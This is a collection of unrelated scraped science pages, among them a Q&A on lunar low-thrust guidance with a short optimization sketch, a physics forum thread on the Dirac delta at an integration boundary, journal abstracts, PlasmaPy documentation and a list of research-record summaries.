It seems to me that it is best to consider such a problem as a two-point boundary value problem, with the initial and final state vector given by some set of non-singular orbital elements (such as the equinoctial elements), and the dynamics given by some accordingly modified form of the Gauss planetary equations.

Are there any standard and/or proven methods to solve this problem in real-time, aboard the spacecraft? Or are there other common guidance strategies that are better recommended?

The requirement of solving this particular guidance problem in real time on board the spacecraft is really demanding. As far as I know, the usual approach is to solve the guidance problem on Earth and then uplink it to the spacecraft. Perhaps the spacecraft control (understanding control as the ability of the spacecraft to follow the desired path in the presence of disturbances) can be made autonomous by some sort of feedback law, MPC, or event-based control. But maybe not, because the dynamics are so slow that it may be simpler to manage control from Earth.

In any case, when facing such problems I almost always find direct methods much easier and more intuitive to employ than indirect TPBVP formulations. The key idea of direct methods is to first discretize and then optimize, whereas indirect ones proceed in the opposite order. A good book is "Spacecraft Trajectory Optimization" by Bruce A. Conway.

• Thanks for your response. In Falck et al. (2014) (arc.aiaa.org/doi/10.2514/6.2014-3714), two closed-loop guidance algorithms for low-thrust vehicles are described and compared. Can't these be used to solve the guidance problem in real-time? Or do I understand their working incorrectly? – woeterb Oct 15 '18 at 9:29
• Taking a glance at this paper, what I see is that it can be implemented in real-time because it employs sub-optimal laws with analytical expressions. If you can find a form to solve your problem analytically, or at most requiring an optimizer to solve a LP or QP with a moderate number of parameters, then ok. – Julio Oct 15 '18 at 12:43
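To make the "first discretize, then optimize" idea from the answer concrete, here is a toy sketch of a direct (single-shooting) formulation for a double integrator rather than the actual lunar transfer; the horizon, node count, and solver defaults are arbitrary illustrative choices:

import numpy as np
from scipy.optimize import minimize

N, T = 30, 1.0
dt = T / N

def effort(u):
    # Discretized control-effort objective, approximating the integral of u^2 dt.
    return dt * np.sum(u**2)

def terminal_defect(u):
    # Forward-Euler rollout of x'' = u starting from rest at x = 0.
    x, v = 0.0, 0.0
    for uk in u:
        x, v = x + dt * v, v + dt * uk
    return np.array([x - 1.0, v])   # require x(T) = 1 and v(T) = 0

res = minimize(effort, np.zeros(N),
               constraints={"type": "eq", "fun": terminal_defect})
print(res.success, terminal_defect(res.x))

A real tool would swap in the thrust- and mass-dependent dynamics (for example the Gauss planetary equations mentioned in the question) and add path constraints, but the structure is the same: the decision variables are the discretized controls and the boundary conditions become algebraic constraints for a standard NLP solver.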
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.830216109752655, "perplexity": 675.7332970744455}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439735963.64/warc/CC-MAIN-20200805153603-20200805183603-00190.warc.gz"}
https://www.physicsforums.com/threads/quick-question-on-the-dirac-delta-function.219072/
# Quick Question on the Dirac Delta Function

1. Mar 1, 2008

### G01

The Dirac delta function, $$\delta (x)$$ has the property that:

(1) $$\int_{-\infty}^{+\infty} f(x) \delta (x) dx = f(0)$$

Will this same effect happen for the following bounds on the integral:

(2) $$\int_{0}^{+\infty} f(x) \delta (x) dx = f(0)$$

My intuition tells me that it should, but the fact that the peak of the delta function lies on one of the bounds makes me think I should double-check my reasoning. So, does anyone know if (2) above is correct? Thanks for any advice you can offer.

Last edited: Mar 1, 2008

2. Mar 1, 2008

### Vid

According to Mathematica, the integral from 0 to infinity and the integral from negative infinity to 0 are each equal to f(0)/2.

3. Mar 1, 2008

### jostpuur

I think I've sometimes seen integration limits like this $$\lim_{\epsilon\to 0^+}\int\limits_{0-\epsilon}^{\infty}$$ to avoid this problem, which suggests that there is probably no very simple answer to the question. For example $$\lim_{n\to\infty} \int\limits_0^{\infty} f(x) \sqrt{\frac{n}{\pi}}e^{-nx^2} dx = \frac{1}{2}f(0)$$ but suppose you modify the kernel like this $$\sqrt{\frac{n}{\pi}} e^{-n(x-x_0(n))^2}$$ where $x_0:\mathbb{N}\to\mathbb{R}$ is some sequence such that $x_0(n)\to 0$ as $n\to\infty$. That still behaves as a delta function if the zero is contained in an open integration interval, but if the zero is on the boundary of the integration interval, the answer could be anything, depending on the chosen $x_0$.

4. Mar 1, 2008

### tiny-tim

$$\delta (x)$$ isn't really a function. It only has meaning inside $$\int_{-\infty}^{+\infty} f(x) \delta (x) dx$$. When it is on its own as part of a calculation, that is because it will be put inside such an integral in the next step of the calculation. This is because it is a symbol which is defined by the property $$\int_{-\infty}^{+\infty} f(x) \delta (x) dx = f(0)$$ Inside $$\int_{0}^{+\infty} f(x) \delta (x) dx$$, it's a symbol without any meaning. (Though of course, you can write $$\int_{-\infty}^{+\infty} \theta (x) f(x) \delta (x) dx$$, which looks pretty similar.)

5. Mar 3, 2008

### Rainbow Child

The answer comes by joining the posts of jostpuur and tiny-tim. The second integral is $$I=\int_{0}^{+\infty} f(x) \delta (x) dx = \int_{-\infty}^{+\infty} \theta (x) f(x) \delta (x) dx$$ where $\theta(x)$ is the step function. Thus $I$ equals $$I=\theta(0)\,f(0)$$ and the question now is what's the definition of the step function. The one which is most commonly used is $\theta(0)=\frac{1}{2}$, thus $$I=\frac{1}{2}\,f(0)$$

6. Mar 3, 2008

### jostpuur

This doesn't fully make sense. If f is a function, then $$\int\limits_0^{\infty} f(x) dx = \int\limits_{-\infty}^{\infty} \theta(x)f(x) dx$$ is true for an arbitrary value of $\theta(0)$. Why should $\theta(0)=1/2$ be chosen when there is $f(x)\delta(x)$ in the integrand instead? I think the original question is of a similar nature to the question of what 0/0 is supposed to be. As I showed in my first response, if you try to approach this integral with some limits, you can get different results with different ways of taking the limit. Thus, we say that limits cannot be used to give a proper meaning to this integral.

7. Mar 3, 2008

Because when the integrand contains a Dirac delta, it is not a function, and so the condition "if f is a function" does not apply. Well, it's more like asking what half of infinity is.
But, yeah, to make Dirac deltas at all consistent (let alone rigorous), you need to enforce a definition of them as a limit of some sequence of well-defined functions. As you demonstrated, which exact sequence you choose will affect the answers you get if you ask questions like the one in this thread. That said, most people who are that concerned about consistency forgo the Dirac delta entirely and instead use distributions. The rest of us just live with the fact that certain operations (again, like the OP) aren't defined.

8. Mar 3, 2008

### jostpuur

I'll be more explicit! Consider the following sequence of functions $$\delta_{n,1}(x) = \sqrt{\frac{n}{\pi}} \exp\big(-n(x-n^{-1/4})^2\big) = \sqrt{\frac{n}{\pi}} \exp\big(-(\sqrt{n}x -n^{1/4})^2\big)$$ It is easy to believe that the distributions represented by these functions converge towards the delta distribution, because this is just the usual Gaussian peak representation, but displaced slightly. Let a and b be such that $a\leq 0 < b$. Let us calculate the following integral. $$\lim_{n\to\infty}\int\limits_a^b f(x)\delta_{n,1}(x) dx = \lim_{n\to\infty} \sqrt{\frac{n}{\pi}} \int\limits_a^b f(x)\exp\big(-(\sqrt{n}x-n^{1/4})^2\big) dx = \lim_{n\to\infty} \frac{1}{\sqrt{\pi}} \int\limits_{\sqrt{n}a-n^{1/4}}^{\sqrt{n}b-n^{1/4}} f\big(\frac{y}{\sqrt{n}} + n^{-1/4}\big) e^{-y^2} dy$$ $$= \frac{1}{\sqrt{\pi}} \int\limits_{-\infty}^{\infty} f(0) e^{-y^2} dy = f(0)$$ However, notice that this is indeed true even with a=0. If we instead choose the sequence $$\delta_{n,2}(x) = \sqrt{\frac{n}{\pi}} e^{-nx^2}$$ we would have $$\lim_{n\to\infty} \int\limits_a^b f(x)\delta_{n,2}(x) dx = f(0),\quad\quad a<0<b$$ and $$\lim_{n\to\infty} \int\limits_a^b f(x)\delta_{n,2}(x) dx = \frac{1}{2}f(0),\quad\quad a=0<b.$$ This means that the distributions represented by the functions $\delta_{n,1}$ and $\delta_{n,2}$ converge towards the same delta distribution. This is so because if you want to calculate $$\int\limits_a^b f(x)\delta(x) dx,\quad\quad a<0<b$$ you can choose either of these sequences, and they give the same result. But when you calculate $$\int\limits_0^b f(x)\delta(x) dx,$$ choosing different representations of the delta distribution, you get different numbers out of the integral. Thus, the delta distribution does not contain enough information to calculate this integral.

Last edited: Mar 3, 2008

9. Mar 3, 2008

### jostpuur

I was not applying any function assumption to any calculation with distributions. I merely noted that, with integrals of functions, the value of $\theta(0)$ does not matter, and then asked why some specific value for it should be chosen when we integrate distributions. Not precisely true. Distributions can be defined without sequences of functions, but sequences of functions still remain an important way to handle distributions. Yes. This was my point. I explained it even more explicitly in my last post #8.

10. Mar 4, 2008

### tiny-tim

The endearing quality of distributions

Because that's how distributions are defined, and what they were created for! It is distributions' most endearing (and, in my opinion, only endearing) quality.

11. Mar 4, 2008

### arildno

Not at all. Let F be some function space over R, I some open interval in R, and define the functional D as follows: $$D(f,I)=f(0) \text{ if } 0\in I,\ f\in F; \qquad D(f,I)=0 \text{ if } 0\notin I,\ f\in F$$ This is the delta functional, and it can be shown to be linear, i.e., a distribution. This is how you rigorously define the Dirac Delta "function".
12. Mar 4, 2008

### Rainbow Child

But that's the whole point! $\delta(x)$ is a distribution, thus it does not behave like ordinary functions. Your point of view is that the integral does not exist, because it can take multiple values, but I say that it can be defined if you choose the value of $\theta(0)$, yielding $$I=\int\limits_0^{\infty} f(x)\,\delta(x) dx = \theta(0)\,f(0)$$

13. Mar 4, 2008

### jostpuur

When you choose the value for theta(0), in effect you are choosing the value of the entire integral. The number that is supposed to come out of the integral is not something that should be chosen. It should come out of some calculation. Right now the calculations don't give a unique number, and I don't feel that choosing some unique number by force would be a very good way to deal with this.
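The disagreement above is easy to check numerically. The short Python sketch below integrates a test function against the two Gaussian sequences from post #8 over $[0,\infty)$; the test function, the grid, and the values of n are arbitrary choices made here for illustration.

```python
import numpy as np
from scipy.integrate import trapezoid

f = np.cos                                 # any smooth test function; f(0) = 1
x = np.linspace(0.0, 1.0, 200_001)         # fine grid standing in for [0, infinity)

def shifted(n):
    """delta_{n,1}: Gaussian peak displaced to the right by n**(-1/4)."""
    return np.sqrt(n / np.pi) * np.exp(-n * (x - n ** -0.25) ** 2)

def centred(n):
    """delta_{n,2}: Gaussian peak centred at x = 0."""
    return np.sqrt(n / np.pi) * np.exp(-n * x ** 2)

for n in (1e2, 1e4, 1e6):
    i1 = trapezoid(f(x) * shifted(n), x)
    i2 = trapezoid(f(x) * centred(n), x)
    print(f"n = {n:.0e}:  shifted kernel -> {i1:.4f},  centred kernel -> {i2:.4f}")

# The shifted kernels tend to f(0) = 1 while the centred ones tend to f(0)/2 = 0.5,
# even though both sequences act identically on test functions supported away from
# the boundary -- which is exactly the ambiguity argued about in the thread.
```

With a different displacement sequence the boundary value can be pushed anywhere between 0 and f(0), which is why the thread concludes that the delta distribution alone does not determine this integral.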
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9586115479469299, "perplexity": 461.92220268549374}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128319912.4/warc/CC-MAIN-20170622220117-20170623000117-00398.warc.gz"}
https://projecteuclid.org/euclid.aoms/1177697827
## The Annals of Mathematical Statistics

### Domains of Optimality of Tests in Simple Random Sampling

David K. Hildebrand

#### Abstract

This paper deals with the structure of sets $\Omega$ of distributions for which a particular test is the most powerful for testing a simple hypothesis $H:f = f_0 \operatorname{vs.} K:f \in \Omega$, that is, with the domain of optimality of a test. The context is restricted to those $\Omega$ consisting of probabilities having continuous positive densities, and to one-sample tests. The important concept is that of a family of tests, one for each significance level. This concept allows us to use the full power of the Neyman-Pearson Lemma. The main results are: (1) The domain of optimality of a test family $\Phi$ is essentially a multiplicatively-convex (convex in the logarithms) cone; hence there are distributions both "near to" and "far from" the null distribution for which $\Phi$ is optimal (Theorems 1, 2, and 3). (2) If $\Phi$ is uniformly most powerful for testing $H:f = f_0 \operatorname{vs.} K:f \in \Omega$ with $n \geqq 2$, then the class of distributions has a monotone likelihood ratio (Theorem 4).

#### Article information

Source: Ann. Math. Statist., Volume 40, Number 1 (1969), 308-312.

First available in Project Euclid: 27 April 2007

https://projecteuclid.org/euclid.aoms/1177697827

Digital Object Identifier: doi:10.1214/aoms/1177697827

Mathematical Reviews number (MathSciNet): MR242308

Zentralblatt MATH identifier: 0177.22804
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7067896127700806, "perplexity": 693.6393309000165}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496668765.35/warc/CC-MAIN-20191116204950-20191116232950-00150.warc.gz"}
https://edoc.unibas.ch/10107/
Ubiquitous mechanisms of energy dissipation in noncontact atomic force microscopy

Ghasemi, S. Alireza and Goedecker, Stefan and Baratoff, Alexis and Lenosky, Thomas and Meyer, Ernst and Hug, Hans J. (2008) Ubiquitous mechanisms of energy dissipation in noncontact atomic force microscopy. Physical Review Letters, Vol. 100, No. 23, 236106, 4 pp.

Full text not available from this repository.

Official URL: http://edoc.unibas.ch/dok/A5262101
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8857088685035706, "perplexity": 29659.208025610325}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178385378.96/warc/CC-MAIN-20210308143535-20210308173535-00129.warc.gz"}
https://docs.plasmapy.org/en/latest/formulary/relativity.html
# Relativistic functions (plasmapy.formulary.relativity)

Functionality for calculating relativistic quantities ($$v \to c$$).

## Functions

Lorentz_factor(V): Return the Lorentz factor.

relativistic_energy(m, v): Calculate the relativistic energy (in Joules) of an object of mass m and velocity v.
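A brief usage sketch of the two functions listed on this page. The import path and function names are taken from the page itself; passing astropy Quantities and converting the result with `.to()` are assumptions based on common PlasmaPy conventions, so the exact call signatures should be checked against the installed version.

```python
import numpy as np
from astropy import units as u
from astropy.constants import c, m_e
from plasmapy.formulary.relativity import Lorentz_factor, relativistic_energy

v = 0.6 * c                            # electron moving at 0.6 c

gamma = Lorentz_factor(v)              # expected: 1 / sqrt(1 - 0.36) = 1.25
energy = relativistic_energy(m_e, v)   # expected: gamma * m_e * c**2, in joules

print(gamma)
print(energy.to(u.MeV))                # ~1.25 * 0.511 MeV, i.e. about 0.64 MeV

# Cross-check against the closed-form expressions these functions implement:
gamma_check = 1.0 / np.sqrt(1.0 - 0.6 ** 2)
print(gamma_check, (gamma_check * m_e * c**2).to(u.MeV))
```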
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9715425372123718, "perplexity": 4345.748839635387}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400201826.20/warc/CC-MAIN-20200921143722-20200921173722-00277.warc.gz"}
https://worldwidescience.org/topicpages/t/tubulovesicular+extensions+cytonemes.html
#### Sample records for tubulovesicular extensions cytonemes 1. Bidirectional transport model of morphogen gradient formation via cytonemes Science.gov (United States) Bressloff, Paul C.; Kim, Hyunjoong 2018-03-01 Morphogen protein gradients play an important role in the spatial regulation of patterning during embryonic development. The most commonly accepted mechanism for gradient formation is diffusion from a source combined with degradation. Recently, there has been growing interest in an alternative mechanism, which is based on the direct delivery of morphogens along thin, actin-rich cellular extensions known as cytonemes. In this paper, we develop a bidirectional motor transport model for the flux of morphogens along cytonemes, linking a source cell to a one-dimensional array of target cells. By solving the steady-state transport equations, we show how a morphogen gradient can be established, and explore how the mean velocity of the motors affects properties of the morphogen gradient such as accumulation time and robustness. In particular, our analysis suggests that in order to achieve robustness with respect to changes in the rate of synthesis of morphogen, the mean velocity has to be negative, that is, retrograde flow or treadmilling dominates. Thus the potential targeting precision of cytonemes comes at an energy cost. We then study the effects of non-uniformly allocating morphogens to the various cytonemes projecting from a source cell. This competition for resources provides a potential regulatory control mechanism not available in diffusion-based models. 2. Cytonemes as specialized signaling filopodia OpenAIRE Kornberg, Thomas B.; Roy, Sougata 2014-01-01 Development creates a vast array of forms and patterns with elegant economy, using a small vocabulary of pattern-generating proteins such as BMPs, FGFs and Hh in similar ways in many different contexts. Despite much theoretical and experimental work, the signaling mechanisms that disperse these morphogen signaling proteins remain controversial. Here, we review the conceptual background and evidence that establishes a fundamental and essential role for cytonemes as specialized filopodia that t... 3. Mold Alkaloid Cytochalasin D Modifies the Morphology and Secretion of fMLP-, LPS-, or PMA-Stimulated Neutrophils upon Adhesion to Fibronectin Directory of Open Access Journals (Sweden) Svetlana I. Galkina 2017-01-01 Full Text Available Neutrophils play an essential role in innate immunity due to their ability to migrate into infected tissues and kill microbes with bactericides located in their secretory granules. Neutrophil transmigration and degranulation are tightly regulated by actin cytoskeleton. Invading pathogens produce alkaloids that cause the depolymerization of actin, such as the mold alkaloid cytochalasin D. We studied the effect of cytochalasin D on the morphology and secretion of fMLP-, LPS-, or PMA-stimulated human neutrophils upon adhesion to fibronectin. Electron microscopy showed that the morphology of the neutrophils adherent to fibronectin in the presence of various stimuli differed. But in the presence of cytochalasin D, all stimulated neutrophils exhibited a uniform nonspread shape and developed thread-like membrane tubulovesicular extensions (cytonemes measuring 200 nm in diameter. Simultaneous detection of neutrophil secretory products by mass spectrometry showed that all tested stimuli caused the secretion of MMP-9, a key enzyme in the neutrophil migration. 
Cytochalasin D impaired the MMP-9 secretion but initiated the release of cathepsin G and other granular bactericides, proinflammatory agents. The release of bactericides apparently occurs through the formation, shedding, and lysis of cytonemes. The production of alkaloids which modify neutrophil responses to stimulation via actin depolymerization may be part of the strategy of pathogen invasion. 4. Sociologists in Extension Science.gov (United States) Christenson, James A.; And Others 1977-01-01 The article describes the work activities of the extension sociologist, the relative advantage and disadvantage of extension roles in relation to teaching/research roles, and the relevance of sociological training and research for extension work. (NQ) 5. Pseudo Algebraically Closed Extensions Science.gov (United States) Bary-Soroker, Lior 2009-07-01 This PhD deals with the notion of pseudo algebraically closed (PAC) extensions of fields. It develops a group-theoretic machinery, based on a generalization of embedding problems, to study these extensions. Perhaps the main result is that although there are many PAC extensions, the Galois closure of a proper PAC extension is separably closed. The dissertation also contains the following subjects. The group theoretical counterpart of pseudo algebraically closed extensions, the so-called projective pairs. Applications to seemingly unrelated subjects, e.g., an analog of Dirichlet's theorem about primes in arithmetic progression for polynomial rings in one variable over infinite fields. 6. Less extensive surgery compared to extensive surgery DEFF Research Database (Denmark) Lauszus, Finn F; Petersen, Astrid Christine; Neumann, Gudrun 2014-01-01 in postmenopausal women was associated with surgery including hysterectomy and bilateral oophorectomy (p < …). Carcinoma was found 138 times (95% CI: 48, 275) more prevalent than the expected rate. CONCLUSION: The survival of women was better in AGCT than in epithelial ovarian tumor. Age and type of surgery, besides stage, influenced survival. Total abdominal hysterectomy and bilateral salpingo-oophorectomy is the recommended treatment with advancing age. At younger age less extensive surgery was associated... 7. Marketing Extension Needs for Sustainable Extension Practices ... African Journals Online (AJOL) However, Age (χ2 = 39.33; p > 0.05), religion (χ2 = 2.752; p > 0.05) and cassava association membership (χ2 = 3.438, p > 0.05) were not significant. Therefore, agricultural marketing techniques should be incorporated into agricultural extension delivery packages to ensure continuous farming practices and adoption of ... 8. Priorities for Extension. Science.gov (United States) Hayward, J. A. Agricultural extension is one component in an array including research, training, education, marketing, international trade, etc. which develop together to bring about growth, and sustained growth determines the priorities for extension. These priorities depend inevitably on the stage of development of a country or region, and on the current… 9. Type extension trees DEFF Research Database (Denmark) Jaeger, Manfred 2006-01-01 We introduce type extension trees as a formal representation language for complex combinatorial features of relational data. Based on a very simple syntax this language provides a unified framework for expressing features as diverse as embedded subgraphs on the one hand, and marginal counts...
We show by various examples how many existing relational data mining techniques can be expressed as the problem of constructing a type extension tree and a discriminant function.... 10. Spacetime extensions Pt. 1 International Nuclear Information System (INIS) Racz, I. 1991-09-01 The problem of the existence of local extensions of spacetime is considered. It is shown that for a spacetime including an incomplete inextendible non-coiling causal geodesic curve there exists a particular C^k (resp. C^(k-)) local extension provided that the curvature and its covariant derivatives are well behaved up to order k + 1 (resp. k) along a family of causal geodesics (around the chosen one). (R.P.) 15 refs 11. Android Access Control Extension Directory of Open Access Journals (Sweden) Anton Baláž 2015-12-01 The main objective of this work is to analyze and extend the security model of mobile devices running on Android OS. The provided security extension is a Linux kernel security module that allows the system administrator to restrict a program's capabilities with per-program profiles. Profiles can allow capabilities like network access, raw socket access, and the permission to read, write, or execute files on matching paths. The module supplements the traditional Android capability access control model by providing mandatory access control (MAC) based on path. This extension increases security of access to system objects in a device and allows creating security sandboxes per application. 12. Homomorphisms between C∗-algebra extensions For C∗-algebra extensions, Ext groups do not classify extension algebras. So one has to study the isomorphism equivalence of extensions. In fact, a homomorphism between two extension algebras may not map the essential ideal into the other in general, so we have to consider properties of extension homomorphisms. 13. Mobile Applications for Extension Science.gov (United States) Drill, Sabrina L. 2012-01-01 Mobile computing devices (smart phones, tablets, etc.) are rapidly becoming the dominant means of communication worldwide and are increasingly being used for scientific investigation. This technology can further our Extension mission by increasing our power for data collection, information dissemination, and informed decision-making. Mobile… 14. Extensions of tempered representations NARCIS (Netherlands) Opdam, E.; Solleveld, M. 2013-01-01 Let π, π′ be irreducible tempered representations of an affine Hecke algebra H with positive parameters. We compute the higher extension groups Ext^n_H(π,π′) explicitly in terms of the representations of analytic R-groups corresponding to π and π′. The result has immediate applications to the 15. Journal of Agricultural Extension African Journals Online (AJOL) Mission Statement The mission of the "Journal of Agricultural Extension" is to publish conceptual papers and empirical research that tests, extends, or builds ... Symbol recognition and interpretation of HIV/AIDS pictorial messages among rural women in Abia State Nigeria 16. Dimension and extensions CERN Document Server Aarts, JM 1993-01-01 Two types of seemingly unrelated extension problems are discussed in this book. Their common focus is a long-standing problem of Johannes de Groot, the main conjecture of which was recently resolved. As is true of many important conjectures, a wide range of mathematical investigations had developed, which have been grouped into the two extension problems.
The first concerns the extending of spaces, the second concerns extending the theory of dimension by replacing the empty space with other spaces. The problem of de Groot concerned compactifications of spaces by means of an adjunction of a set of minimal dimension. This minimal dimension was called the compactness deficiency of a space. Early success in 1942 led de Groot to invent a generalization of the dimension function, called the compactness degree of a space, with the hope that this function would internally characterize the compactness deficiency which is a topological invariant of a space that is externally defined by means of compact extensions of a... 17. Extensive air showers CERN Document Server Rao, M V S 1997-01-01 Ultrahigh energy cosmic rays carry information about their sources and the intervening medium apart from providing a beam of particles for studying certain features of high energy interactions currently inaccessible at man-made accelerators. They can at present be studied only via the extensive air showers (EAS's) they generate while passing through the Earth's atmosphere, since their fluxes are too low for the experiments of limited capability flown in balloons and satellites. The EAS is generated by a series of interactions of the primary cosmic ray and its progeny with the atmospheric nucle Directory of Open Access Journals (Sweden) George M Jacobs 2014-05-01 This article offers guidance to teachers and students in selecting materials for extensive reading (ER). First, the article explains characteristics of ER and reviews some of the potential gains for students who do ER. Second, the article considers criteria for teachers to bear in mind when selecting ER materials. Third, the article then suggests ways that teachers and students can find ER materials. Fourth, guidance is provided to students for when they select what to read from among the ER materials available to them. Finally, advice is given on integrating ER with course textbooks. 19. Continuous multivariate exponential extension International Nuclear Information System (INIS) Block, H.W. 1975-01-01 The Freund-Weinman multivariate exponential extension is generalized to the case of nonidentically distributed marginal distributions. A fatal shock model is given for the resulting distribution. Results in the bivariate case and the concept of constant multivariate hazard rate lead to a continuous distribution related to the multivariate exponential distribution (MVE) of Marshall and Olkin. This distribution is shown to be a special case of the extended Freund-Weinman distribution. A generalization of the bivariate model of Proschan and Sullo leads to a distribution which contains both the extended Freund-Weinman distribution and the MVE 20. Extensions of string theories Energy Technology Data Exchange (ETDEWEB) Amorim, R.; Barcelos-Neto, J. (Universidade Federal do Rio de Janeiro, RJ (Brazil). Inst. de Fisica) 1993-06-01 With the motivation that critical dimensions D ≠ 4 might be suggesting that string theories have not been completely formulated, we study more general alternatives. We first consider a direct extension in the world-sheet formulation with N_B bosons and N_F fermions and analyze the conditions for canceling the anomaly in all possible combinations of N_B, N_F and D. Later on we incorporate degrees of freedom of antisymmetric tensors into the previous model. (orig.).
The only possibility to cancel the anomaly in this case is with N_B = N_F = 1 and our everyday spacetime dimension D = 4. (orig.). 1. Ground System Extensibility Considerations Science.gov (United States) Miller, S. W.; Greene, E. 2017-12-01 The National Oceanic and Atmospheric Administration (NOAA) and National Aeronautics and Space Administration (NASA) are jointly acquiring the next-generation civilian weather and environmental satellite system: the Joint Polar Satellite System (JPSS). The Joint Polar Satellite System will replace the afternoon orbit component and ground processing system of the current Polar-orbiting Operational Environmental Satellites (POES) managed by NOAA. The JPSS satellites will carry a suite of sensors designed to collect meteorological, oceanographic, climatological and geophysical observations of the Earth. The ground processing system for JPSS is known as the JPSS Common Ground System (JPSS CGS). Developed and maintained by Raytheon Intelligence, Information and Services (IIS), the CGS is a multi-mission enterprise system serving NOAA, NASA and their national and international partners, such as NASA's Earth Observation System (EOS), NOAA's current POES, the Japan Aerospace Exploration Agency's (JAXA) Global Change Observation Mission - Water (GCOM-W1), and DoD's Defense Meteorological Satellite Program (DMSP). The CGS provides a wide range of support to a number of national and international missions, including command and control, mission management, data acquisition and routing, and environmental data processing and distribution. The current suite of CGS-supported missions has demonstrated the value of interagency and international partnerships to address global observation needs. With its established infrastructure and existing suite of missions, the CGS is extensible to a wider array of potential new missions. This paper will describe how the inherent scalability and extensibility of the CGS enables the addition of these new missions, with an eye on global enterprise needs in the 2020s and beyond. 2. Attitude Of Extension Personnel To Training And Visit Extension ... African Journals Online (AJOL) In order to make the attitudes of extension workers more affirmative, the paper recommended, inter alia, staff motivation, minimizing political and administrative interference in staff work and a reasonable reduction in the work load of extension staff. Key words: attitude, extension personnel, training and visit. Journal of ... 3. test with extensions Directory of Open Access Journals (Sweden) J. C. W. Rayner 1997-01-01 The data for the tests considered here may be presented in two-way contingency tables with all marginal totals fixed. We show that Pearson's test statistic X_P^2 (P for Pearson) may be partitioned into useful and informative components. The first detects location differences between the treatments, and the subsequent components detect dispersion and higher order moment differences. For Kruskal-Wallis-type data when there are no ties, the location component is the Kruskal-Wallis test. The subsequent components are the extensions. Our approach enables us to generalise to when there are ties, and to when there is a fixed number of categories and a large number of observations. We also propose a generalisation of the well-known median test. In this situation the location-detecting first component of X_P^2 reduces to the usual median test statistic when there are only two categories.
